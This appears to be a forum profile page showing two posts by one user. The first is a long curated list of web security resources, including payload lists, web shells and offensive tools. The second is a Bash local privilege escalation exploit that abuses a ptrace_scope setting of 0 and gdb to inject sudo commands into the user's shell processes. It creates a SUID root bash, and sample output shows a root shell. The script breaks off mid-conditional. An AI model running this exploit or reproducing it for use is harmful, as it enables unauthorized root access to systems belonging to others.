Everything posted by Nytro

  1. Awesome Web Security 🐶 Curated list of Web Security materials and resources. Needless to say, most websites suffer from various types of bugs which may eventually lead to vulnerabilities. Why would this happen so often? There can be many factors involved including misconfiguration, shortage of engineers' security skills, etc. To combat this, here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques, and I highly encourage you to read this article "So you want to be a web security researcher?" first. Please read the contribution guidelines before contributing. 🌈 Want to strengthen your penetration skills? I would recommend playing some awesome-ctfs. If you enjoy this awesome list and would like to support it, check out my Patreon page Also, don't forget to check out my repos 🐾 or say hi on my Twitter! Contents Forums Introduction Tips XSS Prototype Pollution CSV Injection SQL Injection Command Injection ORM Injection FTP Injection XXE CSRF Clickjacking SSRF Web Cache Poisoning Relative Path Overwrite Open Redirect SAML Upload Rails AngularJS ReactJS SSL/TLS Webmail NFS AWS Azure Fingerprint Sub Domain Enumeration Crypto Web Shell OSINT Books DNS Rebinding Evasions XXE CSP WAF JSMVC Authentication Tricks CSRF Clickjacking Remote Code Execution XSS SQL Injection NoSQL Injection FTP Injection XXE SSRF Web Cache Poisoning Header Injection URL Others Browser Exploitation PoCs Database Tools Auditing Command Injection Reconnaissance OSINT Sub Domain Enumeration Code Generating Fuzzing Scanning Penetration Testing Leaking Offensive XSS SQL Injection Template Injection XXE CSRF SSRF Detecting Preventing Proxy Webshell Disassembler Decompiler DNS Rebinding Others Social Engineering Database Blogs Twitter Users Practices Application AWS XSS ModSecurity / OWASP ModSecurity Core Rule Set Community Miscellaneous Forums Phrack Magazine - Ezine written by and for hackers. The Hacker News - Security in a serious way. Security Weekly - The security podcast network. The Register - Biting the hand that feeds IT. Dark Reading - Connecting The Information Security Community. HackDig - Dig high-quality web security articles for hacker. Introduction Tips Hacker101 - Written by hackerone. The Daily Swig - Web security digest - Written by PortSwigger. Web Application Security Zone by Netsparker - Written by Netsparker. Infosec Newbie - Written by Mark Robinson. The Magic of Learning - Written by @bitvijays. CTF Field Guide - Written by Trail of Bits. PayloadsAllTheThings - Written by @swisskyrepo. XSS - Cross-Site Scripting Cross-Site Scripting – Application Security – Google - Written by Google. H5SC - Written by @cure53. AwesomeXSS - Written by @s0md3v. XSS.png - Written by @jackmasa. C.XSS Guide - Written by @JakobKallin and Irene Lobo Valbuena. THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS - Written by Paulos Yibelo. payloadbox/xss-payload-list - Written by @payloadbox. PayloadsAllTheThings - XSS Injection - Written by @swisskyrepo. Prototype Pollution Prototype pollution attack in NodeJS application - Written by @HoLyVieR. CSV Injection CSV Injection -> Meterpreter on Pornhub - Written by Andy. The Absurdly Underestimated Dangers of CSV Injection - Written by George Mauer. PayloadsAllTheThings - CSV Injection - Written by @swisskyrepo. SQL Injection SQL Injection Cheat Sheet - Written by @netsparker. SQL Injection Wiki - Written by NETSPI. SQL Injection Pocket Reference - Written by @LightOS. 
payloadbox/sql-injection-payload-list - Written by @payloadbox. PayloadsAllTheThings - SQL Injection - Written by @swisskyrepo. Command Injection Potential command injection in resolv.rb - Written by @drigg3r. payloadbox/command-injection-payload-list - Written by @payloadbox. PayloadsAllTheThings - Command Injection - Written by @swisskyrepo. ORM Injection HQL for pentesters - Written by @h3xstream. HQL : Hyperinsane Query Language (or how to access the whole SQL API within a HQL injection ?) - Written by @_m0bius. ORM2Pwn: Exploiting injections in Hibernate ORM - Written by Mikhail Egorov. ORM Injection - Written by Simone Onofri. FTP Injection Advisory: Java/Python FTP Injections Allow for Firewall Bypass - Written by Timothy Morgan. SMTP over XXE − how to send emails using Java's XML parser - Written by Alexander Klink. XXE - XML eXternal Entity XXE - Written by @phonexicum. XML external entity (XXE) injection - Written by portswigger. XML Schema, DTD, and Entity Attacks - Written by Timothy D. Morgan and Omar Al Ibrahim. payloadbox/xxe-injection-payload-list - Written by @payloadbox PayloadsAllTheThings - XXE Injection - Written by various contributors. CSRF - Cross-Site Request Forgery Wiping Out CSRF - Written by @jrozner. PayloadsAllTheThings - CSRF Injection - Written by @swisskyrepo. Clickjacking Clickjacking - Written by Imperva. X-Frame-Options: All about Clickjacking? - Written by Mario Heiderich. SSRF - Server-Side Request Forgery SSRF bible. Cheatsheet - Written by Wallarm. PayloadsAllTheThings - Server-Side Request Forgery - Written by @swisskyrepo. Web Cache Poisoning Practical Web Cache Poisoning - Written by @albinowax. PayloadsAllTheThings - Web Cache Deception - Written by @swisskyrepo. Relative Path Overwrite Large-scale analysis of style injection by relative path overwrite - Written by The Morning Paper. MBSD Technical Whitepaper - A few RPO exploitation techniques - Written by Mitsui Bussan Secure Directions, Inc.. Open Redirect Open Redirect Vulnerability - Written by s0cket7. payloadbox/open-redirect-payload-list - Written by @payloadbox. PayloadsAllTheThings - Open Redirect - Written by @swisskyrepo. Security Assertion Markup Language (SAML) How to Hunt Bugs in SAML; a Methodology - Part I - Written by epi. How to Hunt Bugs in SAML; a Methodology - Part II - Written by epi. How to Hunt Bugs in SAML; a Methodology - Part III - Written by epi. PayloadsAllTheThings - SAML Injection - Written by @swisskyrepo. Upload File Upload Restrictions Bypass - Written by Haboob Team. PayloadsAllTheThings - Upload Insecure Files - Written by @swisskyrepo. Rails Rails Security - First part - Written by @qazbnm456. Zen Rails Security Checklist - Written by @brunofacca. Rails SQL Injection - Written by @presidentbeef. Official Rails Security Guide - Written by Rails team. AngularJS XSS without HTML: Client-Side Template Injection with AngularJS - Written by Gareth Heyes. DOM based Angular sandbox escapes - Written by @garethheyes ReactJS XSS via a spoofed React element - Written by Daniel LeCheminant. SSL/TLS SSL & TLS Penetration Testing - Written by APTIVE. Practical introduction to SSL/TLS - Written by @Hakky54. Webmail Why mail() is dangerous in PHP - Written by Robin Peraglie. NFS NFS | PENETRATION TESTING ACADEMY - Written by PENETRATION ACADEMY. AWS PENETRATION TESTING AWS STORAGE: KICKING THE S3 BUCKET - Written by Dwight Hohnstein from Rhino Security Labs. AWS PENETRATION TESTING PART 1. S3 BUCKETS - Written by VirtueSecurity. AWS PENETRATION TESTING PART 2. 
S3, IAM, EC2 - Written by VirtueSecurity. Azure Common Azure Security Vulnerabilities and Misconfigurations - Written by @rhinobenjamin. Cloud Security Risks (Part 1): Azure CSV Injection Vulnerability - Written by @spengietz. Fingerprint Sub Domain Enumeration A penetration tester’s guide to sub-domain enumeration - Written by Bharath. The Art of Subdomain Enumeration - Written by Patrik Hudak. Crypto Applied Crypto Hardening - Written by The bettercrypto.org Team. Web Shell Hunting for Web Shells - Written by Jacob Baines. Hacking with JSP Shells - Written by @_nullbind. OSINT Hacking Cryptocurrency Miners with OSINT Techniques - Written by @s3yfullah. OSINT x UCCU Workshop on Open Source Intelligence - Written by Philippe Lin. 102 Deep Dive in the Dark Web OSINT Style Kirby Plessas - Presented by @kirbstr. The most complete guide to finding anyone’s email - Written by Timur Daudpota. Books XSS Cheat Sheet - 2018 Edition - Written by @brutelogic. DNS Rebinding Attacking Private Networks from the Internet with DNS Rebinding - Written by @brannondorsey Hacking home routers from the Internet - Written by @radekk Evasions XXE Bypass Fix of OOB XXE Using Different encoding - Written by @SpiderSec. CSP Any protection against dynamic module import? - Written by @shhnjk. CSP: bypassing form-action with reflected XSS - Written by Detectify Labs. TWITTER XSS + CSP BYPASS - Written by Paulos Yibelo. Neatly bypassing CSP - Written by Wallarm. Evading CSP with DOM-based dangling markup - Written by portswigger. GitHub's CSP journey - Written by @ptoomey3. GitHub's post-CSP journey - Written by @ptoomey3. WAF Web Application Firewall (WAF) Evasion Techniques - Written by @secjuice. Web Application Firewall (WAF) Evasion Techniques #2 - Written by @secjuice. Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Written by @Brett Buerhaus. How to bypass libinjection in many WAF/NGWAF - Written by @d0znpp. JSMVC JavaScript MVC and Templating Frameworks - Written by Mario Heiderich. Authentication Trend Micro Threat Discovery Appliance - Session Generation Authentication Bypass (CVE-2016-8584) - Written by @malerisch and @steventseeley. Tricks CSRF Neat tricks to bypass CSRF-protection - Written by Twosecurity. Exploiting CSRF on JSON endpoints with Flash and redirects - Written by @riyazwalikar. Stealing CSRF tokens with CSS injection (without iFrames) - Written by @dxa4481. Cracking Java’s RNG for CSRF - Javax Faces and Why CSRF Token Randomness Matters - Written by @rramgattie. Clickjacking Clickjackings in Google worth 14981.7$ - Written by @raushanraj_65039. Remote Code Execution CVE-2019-1306: ARE YOU MY INDEX? - Written by @yu5k3. WebLogic RCE (CVE-2019-2725) Debug Diary - Written by Badcode@Knownsec 404 Team. What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability. - Written by @breenmachine. Exploiting Node.js deserialization bug for Remote Code Execution - Written by OpSecX. DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE - Written by Ambionics Security. How we exploited a remote code execution vulnerability in math.js - Written by @capacitorset. GitHub Enterprise Remote Code Execution - Written by @iblue. Evil Teacher: Code Injection in Moodle - Written by RIPS Technologies. How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Written by Orange. $36k Google App Engine RCE - Written by Ezequiel Pereira. Poor RichFaces - Written by CODE WHITE. 
Remote Code Execution on a Facebook server - Written by @blaklis_. XSS Exploiting XSS with 20 characters limitation - Written by Jorge Lajara. Upgrade self XSS to Exploitable XSS an 3 Ways Technic - Written by HAHWUL. XSS without parentheses and semi-colons - Written by @garethheyes. XSS-Auditor — the protector of unprotected and the deceiver of protected. - Written by @terjanq. Query parameter reordering causes redirect page to render unsafe URL - Written by kenziy. ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else - Written by Mario Heiderich. How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Written by @marin_m. DON'T TRUST THE DOM: BYPASSING XSS MITIGATIONS VIA SCRIPT GADGETS - Written by Sebastian Lekies, Krzysztof Kotowicz, and Eduardo Vela. Uber XSS via Cookie - Written by zhchbin. DOM XSS – auth.uber.com - Written by StamOne_. Stored XSS on Facebook - Written by Enguerran Gillier. XSS in Google Colaboratory + CSP bypass - Written by Michał Bentkowski. Another XSS in Google Colaboratory - Written by Michał Bentkowski. </script> is filtered ? - Written by @strukt93. SQL Injection MySQL Error Based SQL Injection Using EXP - Written by @osandamalith. SQL injection in an UPDATE query - a bug bounty story! - Written by Zombiehelp54. GitHub Enterprise SQL Injection - Written by Orange. Making a Blind SQL Injection a little less blind - Written by TomNomNom. Red Team Tales 0x01: From MSSQL to RCE - Written by Tarlogic. NoSQL Injection GraphQL NoSQL Injection Through JSON Types - Written by Pete. FTP Injection XML Out-Of-Band Data Retrieval - Written by @a66at and Alexey Osipov. XXE OOB exploitation at Java 1.7+ - Written by Ivan Novikov. XXE Evil XML with two encodings - Written by Arseniy Sharoglazov. XXE in WeChat Pay Sdk ( WeChat leave a backdoor on merchant websites) - Written by Rose Jackcode. XML Out-Of-Band Data Retrieval - Written by Timur Yunusov and Alexey Osipov. XXE OOB exploitation at Java 1.7+ (2014): Exfiltration using FTP protocol - Written by Ivan Novikov. XXE OOB extracting via HTTP+FTP using single opened port - Written by skavans. What You Didn't Know About XML External Entities Attacks - Written by Timothy D. Morgan. Pre-authentication XXE vulnerability in the Services Drupal module - Written by Renaud Dubourguais. Forcing XXE Reflection through Server Error Messages - Written by Antti Rantasaari. Exploiting XXE with local DTD files - Written by Arseniy Sharoglazov. Automating local DTD discovery for XXE exploitation - Written by Philippe Arteau. SSRF AWS takeover through SSRF in JavaScript - Written by Gwen. SSRF in Exchange leads to ROOT access in all instances - Written by @0xacb. SSRF to ROOT Access - A $25k bounty for SSRF leading to ROOT Access in all instances by 0xacb. PHP SSRF Techniques - Written by @themiddleblue. SSRF in https://imgur.com/vidgif/url - Written by aesteral. All you need to know about SSRF and how may we write tools to do auto-detect - Written by @Auxy233. A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! - Written by Orange. SSRF Tips - Written by xl7dev. Into the Borg – SSRF inside Google production network - Written by opnsec. Piercing the Veil: Server Side Request Forgery to NIPRNet access - Written by Alyssa Herrera. Web Cache Poisoning Bypassing Web Cache Poisoning Countermeasures - Written by @albinowax. Cache poisoning and other dirty tricks - Written by Wallarm. 
Header Injection Java/Python FTP Injections Allow for Firewall Bypass - Written by Timothy Morgan. URL Some Problems Of URLs - Written by Chris Palmer. Phishing with Unicode Domains - Written by Xudong Zheng. Unicode Domains are bad and you should feel bad for supporting them - Written by VRGSEC. [dev.twitter.com] XSS - Written by Sergey Bobrov. Others How I hacked Google’s bug tracking system itself for $15,600 in bounties - Written by @alex.birsan. Some Tricks From My Secret Group - Written by phithon. Inducing DNS Leaks in Onion Web Services - Written by @epidemics-scepticism. Stored XSS, and SSRF in Google using the Dataset Publishing Language - Written by @signalchaos. Browser Exploitation Frontend (like SOP bypass, URL spoofing, and something like that) The world of Site Isolation and compromised renderer - Written by @shhnjk. The Cookie Monster in Your Browsers - Written by @filedescriptor. Bypassing Mobile Browser Security For Fun And Profit - Written by @rafaybaloch. The inception bar: a new phishing method - Written by jameshfisher. JSON hijacking for the modern web - Written by portswigger. IE11 Information disclosure - local file detection - Written by James Lee. SOP bypass / UXSS – Stealing Credentials Pretty Fast (Edge) - Written by Manuel. Особенности Safari в client-side атаках - Written by Bo0oM. How do we Stop Spilling the Beans Across Origins? - Written by aaj at google.com and mkwst at google.com. Setting arbitrary request headers in Chromium via CRLF injection - Written by Michał Bentkowski. I’m harvesting credit card numbers and passwords from your site. Here’s how. - Written by David Gilbertson. Backend (core of Browser implementation, and often refers to C or C++ part) Breaking UC Browser - Written by Доктор Веб. Attacking JavaScript Engines - A case study of JavaScriptCore and CVE-2016-4622 - Written by phrack@saelo.net. Three roads lead to Rome - Written by @holynop. Exploiting a V8 OOB write. - Written by @halbecaf. SSD Advisory – Chrome Turbofan Remote Code Execution - Written by SecuriTeam Secure Disclosure (SSD). Look Mom, I don't use Shellcode - Browser Exploitation Case Study for Internet Explorer 11 - Written by @moritzj. PUSHING WEBKIT'S BUTTONS WITH A MOBILE PWN2OWN EXPLOIT - Written by @wanderingglitch. A Methodical Approach to Browser Exploitation - Written by RET2 SYSTEMS, INC. CVE-2017-2446 or JSC::JSGlobalObject::isHavingABadTime. - Written by Diary of a reverse-engineer. PoCs Database js-vuln-db - Collection of JavaScript engine CVEs with PoCs by @tunz. awesome-cve-poc - Curated list of CVE PoCs by @qazbnm456. Some-PoC-oR-ExP - 各种漏洞poc、Exp的收集或编写 by @coffeehb. uxss-db - Collection of UXSS CVEs with PoCs by @Metnew. SPLOITUS - Exploits & Tools Search Engine by @i_bo0om. Exploit Database - ultimate archive of Exploits, Shellcode, and Security Papers by Offensive Security. Tools Auditing prowler - Tool for AWS security assessment, auditing and hardening by @Alfresco. slurp - Evaluate the security of S3 buckets by @hehnope. A2SV - Auto Scanning to SSL Vulnerability by @hahwul. Command Injection commix - Automated All-in-One OS command injection and exploitation tool by @commixproject. Reconnaissance OSINT - Open-Source Intelligence Shodan - Shodan is the world's first search engine for Internet-connected devices by @shodanhq. Censys - Censys is a search engine that allows computer scientists to ask questions about the devices and networks that compose the Internet by University of Michigan. 
urlscan.io - Service which analyses websites and the resources they request by @heipei. ZoomEye - Cyberspace Search Engine by @zoomeye_team. FOFA - Cyberspace Search Engine by BAIMAOHUI. NSFOCUS - THREAT INTELLIGENCE PORTAL by NSFOCUS GLOBAL. Photon - Incredibly fast crawler designed for OSINT by @s0md3v. FOCA - FOCA (Fingerprinting Organizations with Collected Archives) is a tool used mainly to find metadata and hidden information in the documents its scans by ElevenPaths. SpiderFoot - Open source footprinting and intelligence-gathering tool by @binarypool. xray - XRay is a tool for recon, mapping and OSINT gathering from public networks by @evilsocket. gitrob - Reconnaissance tool for GitHub organizations by @michenriksen. GSIL - Github Sensitive Information Leakage(Github敏感信息泄露)by @FeeiCN. raven - raven is a Linkedin information gathering tool that can be used by pentesters to gather information about an organization employees using Linkedin by @0x09AL. ReconDog - Reconnaissance Swiss Army Knife by @s0md3v. Databases - start.me - Various databases which you can use for your OSINT research by @technisette. peoplefindThor - the easy way to find people on Facebook by [postkassen](mailto:postkassen@oejvind.dk?subject=peoplefindthor.dk comments). tinfoleak - The most complete open-source tool for Twitter intelligence analysis by @vaguileradiaz. Raccoon - High performance offensive security tool for reconnaissance and vulnerability scanning by @evyatarmeged. Social Mapper - Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf) by @SpiderLabs. espi0n/Dockerfiles - Dockerfiles for various OSINT tools by @espi0n. Sub Domain Enumeration Sublist3r - Sublist3r is a multi-threaded sub-domain enumeration tool for penetration testers by @aboul3la. EyeWitness - EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible by @ChrisTruncer. subDomainsBrute - A simple and fast sub domain brute tool for pentesters by @lijiejie. AQUATONE - Tool for Domain Flyovers by @michenriksen. domain_analyzer - Analyze the security of any domain by finding all the information possible by @eldraco. VirusTotal domain information - Searching for domain information by VirusTotal. Certificate Transparency - Google's Certificate Transparency project fixes several structural flaws in the SSL certificate system by @google. Certificate Search - Enter an Identity (Domain Name, Organization Name, etc), a Certificate Fingerprint (SHA-1 or SHA-256) or a crt.sh ID to search certificate(s) by @crtsh. GSDF - Domain searcher named GoogleSSLdomainFinder by @We5ter. Code Generating VWGen - Vulnerable Web applications Generator by @qazbnm456. Fuzzing wfuzz - Web application bruteforcer by @xmendez. charsetinspect - Script that inspects multi-byte character sets looking for characters with specific user-defined properties by @hack-all-the-things. IPObfuscator - Simple tool to convert the IP to a DWORD IP by @OsandaMalith. domato - DOM fuzzer by @google. FuzzDB - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery. dirhunt - Web crawler optimized for searching and analyzing the directory structure of a site by @nekmo. ssltest - Online service that performs a deep analysis of the configuration of any SSL web server on the public internet. Provided by Qualys SSL Labs. fuzz.txt - Potentially dangerous files by @Bo0oM. 
Scanning wpscan - WPScan is a black box WordPress vulnerability scanner by @wpscanteam. JoomlaScan - Free software to find the components installed in Joomla CMS, built out of the ashes of Joomscan by @drego85. WAScan - Is an open source web application security scanner that uses "black-box" method, created by @m4ll0k. Penetration Testing Burp Suite - Burp Suite is an integrated platform for performing security testing of web applications by portswigger. TIDoS-Framework - A comprehensive web application audit framework to cover up everything from Reconnaissance and OSINT to Vulnerability Analysis by @_tID. Astra - Automated Security Testing For REST API's by @flipkart-incubator. aws_pwn - A collection of AWS penetration testing junk by @dagrz. grayhatwarfare - Public buckets by grayhatwarfare. Offensive XSS - Cross-Site Scripting beef - The Browser Exploitation Framework Project by beefproject. JShell - Get a JavaScript shell with XSS by @s0md3v. XSStrike - XSStrike is a program which can fuzz and bruteforce parameters for XSS. It can also detect and bypass WAFs by @s0md3v. xssor2 - XSS'OR - Hack with JavaScript by @evilcos. SQL Injection sqlmap - Automatic SQL injection and database takeover tool. Template Injection tplmap - Code and Server-Side Template Injection Detection and Exploitation Tool by @epinna. XXE dtd-finder - List DTDs and generate XXE payloads using those local DTDs by @GoSecure. Cross Site Request Forgery XSRFProbe - The Prime CSRF Audit & Exploitation Toolkit by @0xInfection. Server-Side Request Forgery Open redirect/SSRF payload generator - Open redirect/SSRF payload generator by intigriti. Leaking HTTPLeaks - All possible ways, a website can leak HTTP requests by @cure53. dvcs-ripper - Rip web accessible (distributed) version control systems: SVN/GIT/HG... by @kost. DVCS-Pillage - Pillage web accessible GIT, HG and BZR repositories by @evilpacket. GitMiner - Tool for advanced mining for content on Github by @UnkL4b. gitleaks - Searches full repo history for secrets and keys by @zricethezav. CSS-Keylogging - Chrome extension and Express server that exploits keylogging abilities of CSS by @maxchehab. pwngitmanager - Git manager for pentesters by @allyshka. snallygaster - Tool to scan for secret files on HTTP servers by @hannob. LinkFinder - Python script that finds endpoints in JavaScript files by @GerbenJavado. Detecting sqlchop - SQL injection detection engine by chaitin. xsschop - XSS detection engine by chaitin. retire.js - Scanner detecting the use of JavaScript libraries with known vulnerabilities by @RetireJS. malware-jail - Sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction by @HynekPetrak. repo-supervisor - Scan your code for security misconfiguration, search for passwords and secrets. bXSS - bXSS is a simple Blind XSS application adapted from cure53.de/m by @LewisArdern. OpenRASP - An open source RASP solution actively maintained by Baidu Inc. With context-aware detection algorithm the project achieved nearly no false positives. And less than 3% performance reduction is observed under heavy server load. GuardRails - A GitHub App that provides security feedback in Pull Requests. Preventing DOMPurify - DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG by Cure53. js-xss - Sanitize untrusted HTML (to prevent XSS) with a configuration specified by a Whitelist by @leizongmin. 
Acra - Client-side encryption engine for SQL databases, with strong selective encryption, SQL injections prevention and intrusion detection by @cossacklabs. Proxy Charles - HTTP proxy / HTTP monitor / Reverse Proxy that enables a developer to view all of the HTTP and SSL / HTTPS traffic between their machine and the Internet. mitmproxy - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers by @mitmproxy. Webshell nano - Family of code golfed PHP shells by @s0md3v. webshell - This is a webshell open source project by @tennc. Weevely - Weaponized web shell by @epinna. Webshell-Sniper - Manage your website via terminal by @WangYihang. Reverse-Shell-Manager - Reverse Shell Manager via Terminal @WangYihang. reverse-shell - Reverse Shell as a Service by @lukechilds. Disassembler plasma - Plasma is an interactive disassembler for x86/ARM/MIPS by @plasma-disassembler. radare2 - Unix-like reverse engineering framework and commandline tools by @radare. Iaitō - Qt and C++ GUI for radare2 reverse engineering framework by @hteso. Decompiler CFR - Another java decompiler by @LeeAtBenf. DNS Rebinding DNS Rebind Toolkit - DNS Rebind Toolkit is a frontend JavaScript framework for developing DNS Rebinding exploits against vulnerable hosts and services on a local area network (LAN) by @brannondorsey dref - DNS Rebinding Exploitation Framework. Dref does the heavy-lifting for DNS rebinding by @mwrlabs Singularity of Origin - It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine by @nccgroup Whonow DNS Server - A malicious DNS server for executing DNS Rebinding attacks on the fly by @brannondorsey Others Dnslogger - DNS Logger by @iagox86. CyberChef - The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis - by @GCHQ. ntlm_challenger - Parse NTLM over HTTP challenge messages by @b17zr. cefdebug - Minimal code to connect to a CEF debugger by @taviso. ctftool - Interactive CTF Exploration Tool by @taviso. Social Engineering Database haveibeenpwned - Check if you have an account that has been compromised in a data breach by Troy Hunt. Blogs Orange - Taiwan's talented web penetrator. leavesongs - China's talented web penetrator. James Kettle - Head of Research at PortSwigger Web Security. Broken Browser - Fun with Browser Vulnerabilities. Scrutiny - Internet Security through Web Browsers by Dhiraj Mishra. BRETT BUERHAUS - Vulnerability disclosures and rambles on application security. n0tr00t - ~# n0tr00t Security Team. OpnSec - Open Mind Security! RIPS Technologies - Write-ups for PHP vulnerabilities. 0Day Labs - Awesome bug-bounty and challenges writeups. Blog of Osanda - Security Researching and Reverse Engineering. Twitter Users @HackwithGitHub - Initiative to showcase open source hacking tools for hackers and pentesters @filedescriptor - Active penetrator often tweets and writes useful articles @cure53berlin - Cure53 is a German cybersecurity firm. @XssPayloads - The wonderland of JavaScript unexpected usages, and more. @kinugawamasato - Japanese web penetrator. @h3xstream - Security Researcher, interested in web security, crypto, pentest, static analysis but most of all, samy is my hero. @garethheyes - English web penetrator. @hasegawayosuke - Japanese javascript security researcher. @shhnjk - Web and Browsers Security Researcher. 
Practices Application OWASP Juice Shop - Probably the most modern and sophisticated insecure web application - Written by @bkimminich and the @owasp_juiceshop team. BadLibrary - Vulnerable web application for training - Written by @SecureSkyTechnology. Hackxor - Realistic web application hacking game - Written by @albinowax. SELinux Game - Learn SELinux by doing. Solve Puzzles, show skillz - Written by @selinuxgame. Portswigger Web Security Academy - Free trainings and labs - Written by PortSwigger. AWS FLAWS - Amazon AWS CTF challenge - Written by @0xdabbad00. CloudGoat - Rhino Security Labs' "Vulnerable by Design" AWS infrastructure setup tool - Written by @RhinoSecurityLabs. XSS XSS game - Google XSS Challenge - Written by Google. prompt(1) to win - Complex 16-Level XSS Challenge held in summer 2014 (+4 Hidden Levels) - Written by @cure53. alert(1) to win - Series of XSS challenges - Written by @steike. XSS Challenges - Series of XSS challenges - Written by yamagata21. ModSecurity / OWASP ModSecurity Core Rule Set ModSecurity / OWASP ModSecurity Core Rule Set - Series of tutorials to install, configure and tune ModSecurity and the Core Rule Set - Written by @ChrFolini. Community Reddit Stack Overflow Miscellaneous awesome-bug-bounty - Comprehensive curated list of available Bug Bounty & Disclosure Programs and write-ups by @djadmin. bug-bounty-reference - List of bug bounty write-up that is categorized by the bug nature by @ngalongc. Google VRP and Unicorns - Written by Daniel Stelter-Gliese. Brute Forcing Your Facebook Email and Phone Number - Written by PwnDizzle. Pentest + Exploit dev Cheatsheet wallpaper - Penetration Testing and Exploit Dev CheatSheet. The Definitive Security Data Science and Machine Learning Guide - Written by JASON TROS. EQGRP - Decrypted content of eqgrp-auction-file.tar.xz by @x0rz. notes - Some public notes by @ChALkeR. A glimpse into GitHub's Bug Bounty workflow - Written by @gregose. Cybersecurity Campaign Playbook - Written by Belfer Center for Science and International Affairs. Infosec_Reference - Information Security Reference That Doesn't Suck by @rmusser01. Internet of Things Scanner - Check if your internet-connected devices at home are public on Shodan by BullGuard. The Bug Hunters Methodology v2.1 - Written by @jhaddix. $7.5k Google services mix-up - Written by Ezequiel Pereira. How I exploited ACME TLS-SNI-01 issuing Let's Encrypt SSL-certs for any domain using shared hosting - Written by @fransrosen. TL:DR: VPN leaks users’ IPs via WebRTC. I’ve tested seventy VPN providers and 16 of them leaks users’ IPs via WebRTC (23%) - Written by voidsec. Escape and Evasion Egressing Restricted Networks - Written by Chris Patten, Tom Steele. Be careful what you copy: Invisibly inserting usernames into text with Zero-Width Characters - Written by @umpox. Domato Fuzzer's Generation Engine Internals - Written by sigpwn. CSS Is So Overpowered It Can Deanonymize Facebook Users - Written by Ruslan Habalov. Introduction to Web Application Security - Written by @itsC0rg1, @jmkeads and @matir. Finding The Real Origin IPs Hiding Behind CloudFlare or TOR - Written by Paul Dannewitz. Why Facebook's api starts with a for loop - Written by @AntoGarand. How I could have stolen your photos from Google - my first 3 bug bounty writeups - Written by @gergoturcsanyi. An example why NAT is NOT security - Written by @0daywork. WEB APPLICATION PENETRATION TESTING NOTES - Written by Jayson. Hacking with a Heads Up Display - Written by David Scrobonia. 
Alexa Top 1 Million Security - Hacking the Big Ones - Written by @slashcrypto. The bug bounty program that changed my life - Written by Gwen. List of bug bounty writeups - Written by Mariem. Code of Conduct Please note that this project is released with a Contributor Code of Conduct. By participating in this project you agree to abide by its terms. License To the extent possible under law, @qazbnm456 has waived all copyright and related or neighboring rights to this work. Sursa: https://github.com/qazbnm456/awesome-web-security/blob/master/README.md
  2.
#!/usr/bin/env bash
#######################################################
#                                                     #
#         'ptrace_scope' misconfiguration             #
#          Local Privilege Escalation                 #
#                                                     #
#######################################################
# Affected operating systems (TESTED):
#   Parrot Home/Workstation 4.6 (Latest Version)
#   Parrot Security 4.6 (Latest Version)
#   CentOS / RedHat 7.6 (Latest Version)
#   Kali Linux 2018.4 (Latest Version)
#
# Authors: Marcelo Vazquez (s4vitar)
#          Victor Lasa (vowkin)
#
#┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc]
#└──╼ $./exploit.sh
#
#[*] Checking if 'ptrace_scope' is set to 0... [√]
#[*] Checking if 'GDB' is installed... [√]
#[*] System seems vulnerable! [√]
#
#[*] Starting attack...
#[*] PID -> sh
#[*] Path 824: /home/s4vitar
#[*] PID -> bash
#[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> bash
#[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1842: /home/s4vitar
#[*] PID -> bash
#[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc
#
#[*] Cleaning up... [√]
#[*] Spawning root shell... [√]
#
#bash-4.4# whoami
#root
#bash-4.4# id
#uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar)
#bash-4.4#

function startAttack(){
  tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do
    if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then
      echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null)
      echo "[*] Path $(pwdx $shell_pid 2>/dev/null)"
    fi;
    echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1
  done

  if [ -f /tmp/bash ]; then
    /tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..."
    rm /tmp/bash
    echo -e " [√]"
    echo -ne "[*] Spawning root shell..."
    echo -e " [√]\n"
    tput cnorm && bash -p'
  else
    echo -e "\n[*] Could not copy SUID to /tmp/bash [✗]"
  fi
}

echo -ne "[*] Checking if 'ptrace_scope' is set to 0..."

if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then
  echo " [√]"
  echo -ne "[*] Checking if 'GDB' is installed..."

  if command -v gdb >/dev/null 2>&1; then
